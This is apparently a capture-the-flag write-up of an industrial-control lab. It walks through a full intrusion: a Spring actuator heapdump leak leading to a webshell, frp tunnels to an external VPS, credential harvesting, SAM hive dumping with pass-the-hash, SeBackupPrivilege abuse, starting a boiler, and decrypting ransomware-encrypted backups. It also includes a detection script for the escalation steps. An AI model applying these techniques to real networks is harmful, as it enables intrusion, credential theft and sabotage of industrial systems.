ThermalPower

Level 1

Assess the security of the services exposed to the public internet and try to establish a foothold toward the production zone.

Scan the external host with fscan

```text
D:\shentou\fscan>fscan.exe -h 39.99.144.130

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.99.144.130:22 open
39.99.144.130:8080 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.144.130:8080 code:302 len:0 title:None 跳转url: http://39.99.144.130:8080/login;jsessionid=24A74329D58D703BCF1D26E1FFF9EB4F
[*] WebTitle http://39.99.144.130:8080/login;jsessionid=24A74329D58D703BCF1D26E1FFF9EB4F code:200 len:2936 title:火创能源监控画面管理平台
[+] PocScan http://39.99.144.130:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://39.99.144.130:8080 poc-yaml-springboot-env-unauth spring2
```

http://39.99.144.130:8080/actuator/env
leaks Spring's ConfigurableEnvironment, but it is of little use here.

http://39.99.144.130:8080/actuator/heapdump
Download the heapdump and analyse it with JDumpSpider to find the key:

```text
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES
```

From here it is a one-shot: drop an AntSword (蚁剑) webshell and grab flag01


```text
flag01: flag{6e2be8af-cd09-4736-a66a-e9b3f0ddedf7}
```

After connecting with AntSword, run ifconfig: the host's internal IP is 172.22.17.213
Upload fscan to the external jump host and scan the internal network:
./fscan -h 172.22.17.213/24

```text
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.6:80 open
172.22.17.6:21 open
172.22.17.213:22 open
172.22.17.213:8080 open
[*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=C93ED4773035B588919EB46A5CF88927
[*] NetInfo
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=C93ED4773035B588919EB46A5CF88927 code:200 len:2936 title:火创能源监控画面管理平台
[+] ftp 172.22.17.6:21:anonymous
[->]Modbus
[->]PLC
[->]web.config
[->]WinCC
[->]内部软件
[->]火创能源内部资料
[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2
```

Summary of what we have so far:
The external entry point 39.99.144.130 (internal IP 172.22.17.213) is already compromised.
A new internal Windows host 172.22.17.6 has been found; it allows anonymous FTP login and runs a web service on port 80.

Next, set up a tunnel into the internal network: deploy the frps server on the VPS.

frps.toml

```toml
[common]
bindPort = 7000
```

Run ./frps -c frps.toml

Deploy the frpc client on the jump host.
frpc1.toml (the web service on port 80)

```toml
serverAddr = "47.120.14.151"
serverPort = 7000

[[proxies]]
name = "web"
type = "tcp"
localIP = "172.22.17.6"
localPort = 80
remotePort = 20022
```

Run ./frpc -c frpc1.toml

frpc2.toml (the FTP service on port 21)

```toml
serverAddr = "47.120.14.151"
serverPort = 7000

[[proxies]]
name = "ftp"
type = "tcp"
localIP = "172.22.17.6"
localPort = 21
remotePort = 20033
```

Run ./frpc -c frpc2.toml

In 火创能源内部通知.docx (the internal notice) we find:
"Login account names use the employee's full name in lowercase pinyin. For example, Zhang San's account name is zhangsan and his employee ID is 0801. The initial password is account name + @ + employee ID, e.g. zhangsan@0801."

内部员工通讯录.xlsx (the staff directory) leaks every employee's account name and employee ID, so the login conditions are already met.

火创能源内部资料/SCADA.txt

```text
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3
```

So the 172.22.26.0/24 segment needs to be scanned:
./fscan -h 172.22.26.1/24

```text
start infoscan
(icmp) Target 172.22.26.11 is alive
[*] Icmp alive hosts len is: 1
172.22.26.11:445 open
172.22.26.11:139 open
172.22.26.11:135 open
172.22.26.11:80 open
172.22.26.11:1433 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
[->]WIN-SCADA
[->]172.22.26.11
[*] WebTitle http://172.22.26.11 code:200 len:703 title:IIS Windows Server
```

A Windows host 172.22.26.11 is found with a weak mssql password (sa/123456); the credentials obtained earlier should also allow RDP login.

172.22.17.6 is probably of no further use, so kill the frpc processes and deploy new frpc forwards.

frpc1.toml

```toml
serverAddr = "47.120.14.151"
serverPort = 7000

[[proxies]]
name = "web"
type = "tcp"
localIP = "172.22.26.11"
localPort = 80
remotePort = 20022
```

Run ./frpc -c frpc1.toml

frpc2.toml

```toml
serverAddr = "47.120.14.151"
serverPort = 7000

[[proxies]]
name = "mssql"
type = "tcp"
localIP = "172.22.26.11"
localPort = 1433
remotePort = 20033
```

Run ./frpc -c frpc2.toml

frpc3.toml

```toml
serverAddr = "47.120.14.151"
serverPort = 7000

[[proxies]]
name = "rdp"
type = "tcp"
localIP = "172.22.26.11"
localPort = 3389
remotePort = 20044
```

Run ./frpc -c frpc3.toml

Logging in to mssql with MDUT succeeds; every file on the host can be read and commands can be executed.
RDP login also works; once inside, the files turn out to have been encrypted by ransomware.

Level 2

Try to take over the SCADA engineer's personal PC and escalate to SYSTEM by abusing a Windows privileged group.

Using the personal information leaked in 内部员工通讯录.xlsx, RDP into 172.22.17.6; chenhua/chenhua@0813 is used as the example here.

Set up a forward for port 3389 first.
frpc1.toml

```toml
serverAddr = "47.120.14.151"
serverPort = 7000

[[proxies]]
name = "rdp111"
type = "tcp"
localIP = "172.22.17.6"
localPort = 3389
remotePort = 20022
```

Run ./frpc -c frpc1.toml

RDP into 172.22.17.6 as chenhua.
The challenge says to escalate through a privileged group, so check which groups the account belongs to:

```text
whoami /groups

组信息
-----------------

组名 类型 SID 属性
====================================== ====== ============ ==============================
Everyone 已知组 S-1-1-0 必需的组, 启用于默认, 启用的组
BUILTIN\Backup Operators 别名 S-1-5-32-551 只用于拒绝的组
BUILTIN\Remote Desktop Users 别名 S-1-5-32-555 必需的组, 启用于默认, 启用的组
BUILTIN\Users 别名 S-1-5-32-545 必需的组, 启用于默认, 启用的组
NT AUTHORITY\REMOTE INTERACTIVE LOGON 已知组 S-1-5-14 必需的组, 启用于默认, 启用的组
NT AUTHORITY\INTERACTIVE 已知组 S-1-5-4 必需的组, 启用于默认, 启用的组
NT AUTHORITY\Authenticated Users 已知组 S-1-5-11 必需的组, 启用于默认, 启用的组
NT AUTHORITY\This Organization 已知组 S-1-5-15 必需的组, 启用于默认, 启用的组
NT AUTHORITY\本地帐户 已知组 S-1-5-113 必需的组, 启用于默认, 启用的组
LOCAL 已知组 S-1-2-0 必需的组, 启用于默认, 启用的组
NT AUTHORITY\NTLM Authentication 已知组 S-1-5-64-10 必需的组, 启用于默认, 启用的组
Mandatory Label\Medium Mandatory Level 标签 S-1-16-8192
```

The user is a member of the Backup Operators group. By default this group is granted the SeBackup and SeRestore privileges, which allow reading and writing any file on the system regardless of its DACL (discretionary access control list). The rationale behind the privilege is to let certain users perform backups without being granted full administrative rights.

Once SeBackup and SeRestore are held, privilege escalation is straightforward through several techniques, including copying the SAM and SYSTEM registry hives to extract the local administrator's password hash.

But here the user has not actually been assigned SeBackup by default:

```text
whoami /priv

特权信息
----------------------

特权名 描述 状态
============================= ============== ======
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已禁用
```

If it were present, there would be plenty of ways to use it.

Although the configuration is a bit off, escalation via a registry SAM dump still works here: dump sam and system directly, and the export turns out to succeed without the privilege showing up:

```text
PS C:\Users\chenhua\Desktop> cd C:\

PS C:\> mkdir Temp

PS C:\> cd C:\Temp

PS C:\Temp> reg save hklm\sam c:\Temp\sam

PS C:\Temp> reg save hklm\system c:\Temp\system
```

Download both hives locally and extract Administrator's NTLM hash:

```text
┌──(root㉿kali)-[/home/kali/桌面]
└─# impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x6c2be46aaccdf65a9b7be2941d6e7759
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5:::
chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658:::
zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215:::
wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3:::
zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81:::
zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d:::
lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a:::
liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471:::
wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07:::
zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432:::
chenhua:1009:aad3b435b51404eeaad3b435b51404ee:07ff24422b538b97f3c297cc8ddc7615:::
[*] Cleaning up...
```

Set up a socks5 tunnel on the jump host.
frpc2.toml

```ini
[common]
server_addr = 47.120.14.151
server_port = 7000

[socks5]
type = tcp
plugin = socks5
remote_port = 5000
```

```text
proxychains python wmiexec.py administrator@172.22.17.6 -hashes :f82292b7ac79b05d5b0e3d302bd0d279 -codec gbk

C:\Users\Administrator\flag>type flag02.txt
_____.__ _______ ________
_/ ____\ | _____ ____ \ _ \ \_____ \
\ __\| | \__ \ / ___\/ /_\ \ / ____/
| | | |__/ __ \_/ /_/ > \_/ \/ \
|__| |____(____ /\___ / \_____ /\_______ \
\//_____/ \/ \/


flag02: flag{27d59839-ce43-41eb-8948-a568ee0544b9}
```

Method 2: escalation with SeBackupPrivilege

SeBackupPrivilege exists to implement backup operations: it allows retrieving a file's contents even when the file's security descriptor would not grant that access. diskshadow is a built-in Windows feature that helps create backups. See hackingarticles; the escalation can be performed locally or on a DC.

The user is in the Backup Operators group, so the group's privileges can be used to escalate.
First, transfer SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll to the remote desktop.

Open PowerShell:

```text
PS C:\Users\chenhua> cd .\Desktop\
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\Users\chenhua\Desktop> Set-SeBackupPrivilege
PS C:\Users\chenhua\Desktop> Get-SeBackupPrivilege
SeBackupPrivilege is enabled
PS C:\Users\chenhua\Desktop> dir C:\Users\Administrator\flag


目录: C:\Users\Administrator\flag


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2025/4/30 20:55 350 flag02.txt


PS C:\Users\chenhua\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\flag\flag02.txt C:\Users\chenhua\Desktop\flag02.txt -Overwrite
Copied 350 bytes
```

flag02.txt can then be opened on the desktop.
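From the defender's side, both escalation paths above (the reg save hive export and the SeBackupPrivilege cmdlets) leave distinctive process command lines. The following detection sketch is an added example, not part of the original writeup or of any product: it runs two rules over constructed process-creation records shaped like Windows 4688 / Sysmon Event ID 1 fields (the records are made up here and mirror only commands shown on this page).

```python
import re

# Constructed sample process-creation records (4688 / Sysmon ID 1 style fields);
# not telemetry from the range, only the command shapes that appear in this writeup.
SAMPLE_EVENTS = [
    {"User": "WIN-ENGINEER\\chenhua", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save hklm\\sam c:\\Temp\\sam"},
    {"User": "WIN-ENGINEER\\chenhua", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg  save HKLM\\SYSTEM c:\\Temp\\system"},
    {"User": "WIN-ENGINEER\\chenhua", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"},
    {"User": "WIN-ENGINEER\\chenhua", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Import-Module .\\SeBackupPrivilegeCmdLets.dll; Set-SeBackupPrivilege"},
    {"User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg export HKLM\\SOFTWARE\\Contoso C:\\backup\\contoso.reg"},
]

# Rule 1: reg save / reg export of the hives that together yield local credential material.
HIVE_SAVE = re.compile(r"\breg(?:\.exe)?\s+(?:save|export)\s+\"?hklm\\(sam|system|security)\b", re.I)
# Rule 2: cmdlets of the SeBackupPrivilege PowerShell module used in Method 2 above.
SEBACKUP_CMDLET = re.compile(r"\b(Set-SeBackupPrivilege|Copy-FileSeBackupPrivilege)\b", re.I)


def classify(event):
    """Return (rule_name, detail) for a suspicious record, or None for a benign one."""
    cmd = event["CommandLine"]
    m = HIVE_SAVE.search(cmd)
    if m:
        return ("registry_hive_export", m.group(1).lower())
    m = SEBACKUP_CMDLET.search(cmd)
    if m:
        return ("sebackupprivilege_module", m.group(1))
    return None


def scan(events):
    """Run every record through classify() and keep the hits together with the acting user."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit:
            findings.append({"user": ev["User"], "rule": hit[0], "detail": hit[1], "cmd": ev["CommandLine"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['user']}: {f['cmd']}")
```

A hit from a non-backup account (here a Backup Operators member that never runs scheduled backups) is the signal worth alerting on; the same rules fire for legitimate backup jobs, so pair them with an allow-list of known backup service accounts.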

Level 3

Try to take over the SCADA engineer workstation and start the boiler.

RDP into 172.22.26.11 as Administrator and simply click "boiler on"; the flag appears.

```text
flag{bcd080d5-2cf1-4095-ac15-fa4bef9ca1c0}
```

Level 4

Try to obtain the database backup on the SCADA engineer workstation and analyse whether the backup file leaks sensitive data.

Again RDP into 172.22.26.11 as Administrator; a txt file on the desktop says the files have been encrypted by ransomware.
Also on the desktop is ScadaDB.sql.locky; the challenge attachment provides privateKey and encryptedAesKey, and Lockyou.exe is found on the C: drive. So ScadaDB.sql.locky now needs to be decrypted.

privateKey

```xml
<RSAKeyValue><Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus><Exponent>AQAB</Exponent><P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P><Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q><DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP><DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ><InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ><D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D></RSAKeyValue>
```

First convert the XML key to PEM format (https://www.ssleye.com/ssltool/pem_xml.html):

```text
-----BEGIN PRIVATE KEY-----
-----END PRIVATE KEY-----
```

Then decrypt encryptedAesKey with an online RSA tool (https://www.lddgo.net/encrypt/rsa).


encryptedAesKey

```text
lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g=
```

After decryption:

```text
cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=
```
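The two online tools above (XML-to-PEM conversion and RSA decryption of the AES key) can be replaced by a few lines of standard-library Python, which also keeps the recovered private key off third-party websites. The block below is an added example, not code from the writeup or from the challenge: it parses the .NET RSAKeyValue XML quoted above (only Modulus, Exponent and D are needed for a plain private-key operation), performs textbook RSA, and strips RSAES-PKCS1-v1_5 padding, which is assumed here because RSAKeyValue XML comes from .NET and RSACryptoServiceProvider.Encrypt defaults to PKCS#1 v1.5; if the key had been wrapped with OAEP the unpad step raises instead of returning garbage.

```python
import base64
import xml.etree.ElementTree as ET

# privateKey from the challenge attachment, as quoted on this page (P/Q/DP/DQ/InverseQ omitted).
PRIVATE_KEY_XML = (
    "<RSAKeyValue>"
    "<Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus>"
    "<Exponent>AQAB</Exponent>"
    "<D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D>"
    "</RSAKeyValue>"
)
# encryptedAesKey from the challenge attachment, as quoted on this page.
ENCRYPTED_AES_KEY_B64 = "lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="


def parse_rsa_key_value(xml_text):
    """Return (n, e, d) from .NET RSAKeyValue XML; each field is a big-endian base64 integer."""
    root = ET.fromstring(xml_text)

    def field(tag):
        return int.from_bytes(base64.b64decode(root.find(tag).text), "big")

    return field("Modulus"), field("Exponent"), field("D")


def pkcs1_v15_unpad(block):
    """Strip an RSAES-PKCS1-v1_5 type-2 block: 0x00 0x02 <at least 8 non-zero bytes> 0x00 <data>."""
    if len(block) < 11 or block[0] != 0 or block[1] != 2:
        raise ValueError("not a PKCS#1 v1.5 type-2 block (OAEP padding or wrong key?)")
    sep = block.index(b"\x00", 2)  # first zero after the 0x00 0x02 header
    if sep < 10:
        raise ValueError("padding string shorter than 8 bytes")
    return block[sep + 1:]


def rsa_decrypt_pkcs1_v15(ciphertext, n, d):
    """Textbook RSA (m = c^d mod n) on one modulus-sized block, then PKCS#1 v1.5 unpadding."""
    k = (n.bit_length() + 7) // 8
    if len(ciphertext) != k:
        raise ValueError("ciphertext length does not match the modulus size")
    m = pow(int.from_bytes(ciphertext, "big"), d, n)
    return pkcs1_v15_unpad(m.to_bytes(k, "big"))


def recover_aes_key(xml_text=PRIVATE_KEY_XML, enc_b64=ENCRYPTED_AES_KEY_B64):
    """Unwrap the file-encryption key: the AES key bytes the CBC script below expects."""
    n, _e, d = parse_rsa_key_value(xml_text)
    return rsa_decrypt_pkcs1_v15(base64.b64decode(enc_b64), n, d)


if __name__ == "__main__":
    aes_key = recover_aes_key()
    print(len(aes_key) * 8, "bit AES key:", base64.b64encode(aes_key).decode())
```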

Finally, write an AES script to decrypt the sql file, using the first 16 bytes of the file as the IV:

```python
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

# Read the encrypted file
encrypted_file = 'ScadaDB.sql.locky'
with open(encrypted_file, 'rb') as file:
    encrypted_data = file.read()

# Decryption key (the AES key recovered from encryptedAesKey)
key = 'cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk='
key = base64.b64decode(key)

# The first 16 bytes of the file are the IV
iv = encrypted_data[:16]

# Create the AES-CBC decryptor
cipher = AES.new(key, AES.MODE_CBC, IV=iv)

# Decrypt the data (everything after the IV) and strip PKCS#7 padding
decrypted_data = unpad(cipher.decrypt(encrypted_data[16:]), AES.block_size)

# Write the decrypted content to a new file
decrypted_file = 'decrypted_file.txt'
with open(decrypted_file, 'wb') as file:
    file.write(decrypted_data)
print(f'文件解密完成,解密后的数据已保存到 {decrypted_file}')
```

flag04 is found in the decrypted file:

```text
flag{63cd8cd5-151f-4f29-bdc7-f80312888158}
```